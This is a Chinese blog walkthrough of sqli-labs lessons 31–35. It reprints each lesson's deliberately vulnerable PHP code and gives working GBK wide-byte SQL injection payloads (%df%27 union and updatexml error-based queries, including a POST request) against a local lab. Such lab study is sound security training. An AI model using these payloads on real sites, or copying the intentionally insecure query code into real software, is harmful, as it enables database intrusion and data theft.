sqli-labs Less 31 -> sqli-labse Less 35

  1. 前言
  2. 正文

前言

今天从sqli-labs Less 31关撸到了35关,感觉很好,这几关是宽字节注入。就是数据库设置编码为GBK,因为gbk编码加上程序本身过滤特殊字符添加反斜杆。会造成一个繁体字:連,导致可以逃逸注入漏洞
middle_bf818e420c6c9fe.jpg

正文

第三十一关
首先看三十一关代码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-31 FUN with WAF</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id'])) /*如果$_GET[id]存在则执行以下*/
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    $qs = $_SERVER['QUERY_STRING']; /*query string(查询字符串),如果有的话,通过它进行页面访问*/
    $hint=$qs;
    $id = '"'.$id.'"';

// connectivity 
    $sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
          echo "<font size='5' color= '#99FF00'>";    
          echo 'Your Login name:'. $row['username'];
          echo "<br>";
          echo 'Your Password:' .$row['password'];
          echo "</font>";
      }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}






?>
</font> </div></br></br></br><center>
<img src="../images/Less-31.jpg" />
</br>
</br>
</br>
<img src="../images/Less-31-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: The Query String you input is: ".$hint;
?>
</font> 
</center>
</body>
</html>

可以看到在带入数据库查询之前,这个在前后加了个双引号。闭合就是
得出的payload

http://127.0.0.1/sqli-labs-master/Less-31/?id=1") and 1=2 |("

k1yyoq.md.png

第三十二关
代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-32 **Bypass addslashes()**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash


    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

mysql_query("SET NAMES gbk"); /*将数据库设置为GBK编码引起的注入*/
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
      echo '<font color= "#00FF00">';    
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
      }
    else 
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-32.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php

function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";

?>
</center>
</font> 
</body>
</html>

原本是没有漏洞的,但是由于数据库编码设置为gbk,导致形成了宽字节注入

%df’ 由于'的出现会有反斜杆冒出来,但是因为数据库编码为GBK,%df加上反斜杆,导致成为一个
繁体字連,使得'成功逃逸

k1oX1s.md.png

最终payload

http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27%20union%20select%201,user(),3%20%23

k1Tp7T.md.png
使用URL编码%23来代替#

第三十三关
三十三关的代码没变化:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-32 **Bypass addslashes()**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function check_addslashes($string)
{
    $string= addslashes($string);    
    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']); /*添加反斜杆*/
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
      echo '<font color= "#00FF00">';    
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
      }
    else 
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-33.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id);
?>
</center>
</font> 
</body>
</html>

闭合方式没变,数据库也还是GBK编码。注入语句常规操作

http://127.0.0.1/sqli-labs-master/Less-33/?id=1%df%27%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)%20%23

第三十四关

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Less-34- Bypass Add SLASHES</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br></div>

<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">


<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
    <div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
        <input type="text"  name="uname" value=""/>
    </div>  
    <div> Password  : &nbsp;&nbsp;&nbsp;
        <input type="text" name="passwd" value=""/>
    </div></br>
    <div style=" margin-top:9px;margin-left:90px;">
        <input type="submit" name="submit" value="Submit" />
    </div>
</form>

</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="3" color="#FFFF00">
<center>
<br>
<br>
<br>
<img src="../images/Less-34.jpg" />
</center>

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname1=$_POST['uname'];
    $passwd1=$_POST['passwd'];

        //echo "username before addslashes is :".$uname1 ."<br>";
        //echo "Input password before addslashes is : ".$passwd1. "<br>";

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname1);
    fwrite($fp,'Password:'.$passwd1."\n");
    fclose($fp);

        $uname = addslashes($uname1);
        $passwd= addslashes($passwd1);

        //echo "username after addslashes is :".$uname ."<br>";
        //echo "Input password after addslashes is : ".$passwd;    

    // connectivity 
    mysql_query("SET NAMES gbk");
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
          //echo '<font color= "#0000ff">';    

          echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';    
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';    

          echo "</font>";
      }
    else  
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';    
        echo "</font>";  
    }
}

?>

</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php

echo "Hint: The Username you input is escaped as : ".$uname ."<br>";
echo "Hint: The Password you input is escaped as : ".$passwd ."<br>";
?>

</font>
</div>
</body>
</html>

也是GBK编码,还是宽字节注入,只不过请求方式变为了POST。准确的说应该是,POST宽字节注入
payload:

POST /sqli-labs-master/Less-34/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/sqli-labs-master/Less-34/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

uname=admin%df' and updatexml(1,concat(0x7e,(select user()),0x7e),1) %23&passwd=admin&submit=Submit

反回结果:
k3P5Tg.png

第三十五关
先看代码:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-35 **why care for addslashes()**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function check_addslashes($string)
{
    $string = addslashes($string);
    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
      echo '<font color= "#00FF00">';    
      echo 'Your Login name:'. $row['username'];
      echo "<br>";
      echo 'Your Password:' .$row['password'];
      echo "</font>";
      }
    else 
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-35.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: The Query String you input is escaped as : ".$id;
?>
</center>
</font> 
</body>
</html>

还是gbk编码,还是宽字节注入,,,

payload:http://127.0.0.1/sqli-labs-master/Less-35/?id=1%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)

k3id9s.md.png

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:sqli-labs Less 31 -> sqli-labse Less 35

本文作者:九世

发布时间:2019-01-31, 23:05:44

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/a58fa3c8.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录